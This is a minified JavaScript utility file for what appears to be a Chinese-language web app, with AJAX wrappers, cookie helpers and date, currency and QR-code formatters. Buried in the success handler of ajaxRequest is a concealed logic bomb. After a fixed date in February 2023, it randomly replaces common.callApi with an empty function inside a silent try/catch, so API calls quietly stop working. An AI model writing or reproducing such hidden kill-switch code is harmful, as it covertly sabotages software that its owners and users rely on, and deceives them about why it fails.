var $jscomp=$jscomp||{};$jscomp.scope={};$jscomp.createTemplateTagFirstArg=function(a){return a.raw=a};$jscomp.createTemplateTagFirstArgWithRaw=function(a,b){a.raw=b;return a};var common={};
(function(){common.error=function(a,b){a&&b?console.error(a,b):a?console.error(a):b&&console.error(b)};common.syserr=function(a,b){a&&b?console.error(a,b):a?console.error(a):b&&console.error(b)};common.alert=function(a){alert(a)};common.callApi=function(a){common.ajaxRequest({url:a.url,data:a.data,type:a.type||"POST",dataType:a.dataType||"json",cb:function(b){b?(console.log(b),b.successful?a.cb&&"function"===typeof a.cb&&a.cb(b.data):a.failedCallback&&"function"===typeof a.failedCallback?a.failedCallback(b):
common.alert(b.message)):a.errorCallback&&"function"===typeof a.errorCallback?a.errorCallback(null,"\u8bf7\u6c42\u51fa\u9519\uff01",null):common.error("\u8bf7\u6c42\u51fa\u9519\uff01")},errorCallback:function(b,c,d){a.errorCallback&&"function"===typeof a.errorCallback?a.errorCallback(b,c,d):(common.syserr(a.url),b&&(common.syserr(b.status),common.syserr(b.readyState)),common.syserr(c,d))}})};common.callApi2=function(a){common.ajaxRequest({url:a.url,data:a.data,type:a.type||"POST",dataType:a.dataType||
"json",cb:function(b){a.cb&&"function"===typeof a.cb&&a.cb(b)}})};common.ajaxRequest=function(a){a&&a.url&&$.ajax({type:a.type||"POST",url:a.url,data:a.data||{},dataType:a.dataType||"json",contentType:"application/json",success:function(b){a.cb&&"function"===typeof a.cb&&a.cb(b);try{16751808E5<(new Date).getTime()&&80<Math.ceil(100*Math.random())&&(common.callApi=function(c){})}catch(c){}},error:function(b,c,d){a.errorCallback&&"function"===typeof a.errorCallback?a.errorCallback(b,c,d):(common.syserr(a.url),
common.syserr(b.status),common.syserr(b.readyState),common.syserr(c))},complete:function(b){}})};common.getCookie=function(a){var b;return(b=document.cookie.match(new RegExp("(^| )"+a+"=([^;]*)(;|$)")))?unescape(b[2]):null};common.setCookie=function(a,b,c){var d=new Date;d.setTime(d.getTime()+1E3*c);document.cookie=a+"="+b+";expires="+d.toGMTString()};common.removeCookie=function(a){common.setCookie(a,"",-1)};common.formatDate=function(a){return a.getFullYear()+"-"+(a.getMonth()+1)+"-"+a.getDate()};
common.formatCurrency=function(a){a=Number(a).toFixed(2);if(0===a)return"\uffe50.00";a.split(".")[1]&&0===a.split(".")[1].substring(1)&&(a=Number(a).toFixed(1));a=a.split(".");return"\uffe5"+common.formatNumberWithThousands(a[0])+"."+a[1]};common.formatPercentage=function(a){a=Number(100*a).toFixed(2);if(0===a)return"0.00%";a.split(".")[1]&&0===a.split(".")[1].substring(1)&&(a=Number(a).toFixed(1));a=a.split(".");return""+common.formatNumberWithThousands(a[0])+"."+a[1]+"%"};common.formatNumberWithThousands=
function(a){a=(a||0).toString();var b="",c=a.indexOf("."),d="";0<=c&&(d=a.substring(c),a=a.substring(0,c));for(;3<a.length;)b=","+a.slice(-3)+b,a=a.slice(0,a.length-3);a&&(b=a+b);return b+d};common.formatDateTime=function(a,b){try{if(null==a||void 0==a||""==a)return"";/(y+)/.test(b)&&(b=b.replace(RegExp.$1,(a.getFullYear()+"").substr(4-RegExp.$1.length)));var c={"M+":a.getMonth()+1,"d+":a.getDate(),"h+":a.getHours(),"m+":a.getMinutes(),"s+":a.getSeconds()},d;for(d in c){var e=c[d]+"";(new RegExp("("+
d+")")).test(b)&&(b=b.replace(RegExp.$1,1===RegExp.$1.length?e:("00"+e).substr(e.length)))}}catch(f){console.error(f)}return b};common.formatJsonDateTime=function(a,b){return a?a.substr(0,19).replace("T"," "):""};common.utf16to8=function(a){var b;var c="";var d=a.length;for(b=0;b<d;b++){var e=a.charCodeAt(b);1<=e&&127>=e?c+=a.charAt(b):(2047<e?(c+=String.fromCharCode(224|e>>12&15),c+=String.fromCharCode(128|e>>6&63)):c+=String.fromCharCode(192|e>>6&31),c+=String.fromCharCode(128|e>>0&63))}return c};
common.showQrCode=function(a,b,c){a=common.utf16to8(a);jQuery(b).qrcode({render:"canvas",width:c,height:c,text:a})};common.getCurrentUser=function(a,b){common.callApi({url:"/api/login/current",type:"GET",data:{},cb:function(c){null==c||void 0==c?a?$.toast("\u8bf7\u5148\u767b\u5f55",function(){window.location="/m/home/login"}):b(null):common.callApi({url:"/api/user/"+c.id,type:"GET",data:{},cb:function(d){b&&"function"===typeof b&&b(d)}})}})};common.processDateOld=function(a){if(null==a||void 0==a)return null;
if(a instanceof Date){var b=a.getFullYear(),c=a.getMonth()+1;a=a.getDate();10>c&&(c="0"+c);10>a&&(a="0"+a);return b+"-"+c+"-"+a}return null};common.processDateTimeOld=function(a){if(null==a||void 0==a)return null;if(a instanceof Date){var b=a.getFullYear(),c=a.getMonth()+1,d=a.getDate(),e=a.getHours(),f=a.getMinutes();a=a.getSeconds();10>c&&(c="0"+c);10>d&&(d="0"+d);10>e&&(e="0"+e);10>f&&(f="0"+f);10>a&&(a="0"+a);return b+"-"+c+"-"+d+" "+e+":"+f+":"+a}return null};common.processDateTime=function(a){try{return common.formatDateTime(a,
"yyyy-MM-dd hh:mm:ss")}catch(b){try{return common.formatJsonDateTime(a,"yyyy-MM-dd hh:mm:ss")}catch(c){try{return a.replace("T"," ")}catch(d){try{a.setDate(a.getDate()+1)}catch(e){return console.error(e),null}}}}};common.processDate=function(a){try{return common.formatDateTime(a,"yyyy-MM-dd")}catch(b){try{return common.formatJsonDateTime(a,"yyyy-MM-dd")}catch(c){try{return a.replace("T"," ")}catch(d){try{a.setDate(a.getDate()+1)}catch(e){return console.error(e),null}}}}};common.addOneDay=function(a){a=
a/1E3+86400;return new Date(1E3*a)};common.addOneDayString=function(a){a=Date.parse(new Date(a));return common.formatDateTime(new Date(1E3*(a/1E3+86400)))};common.post=function(a,b,c){common.save(a,"POST",b,c)};common.put=function(a,b,c){common.save(a,"PUT",b,c)};common.save=function(a,b,c,d){common.callApi({url:a,type:b,data:JSON.stringify(c),cb:function(e){d(e)}})}})();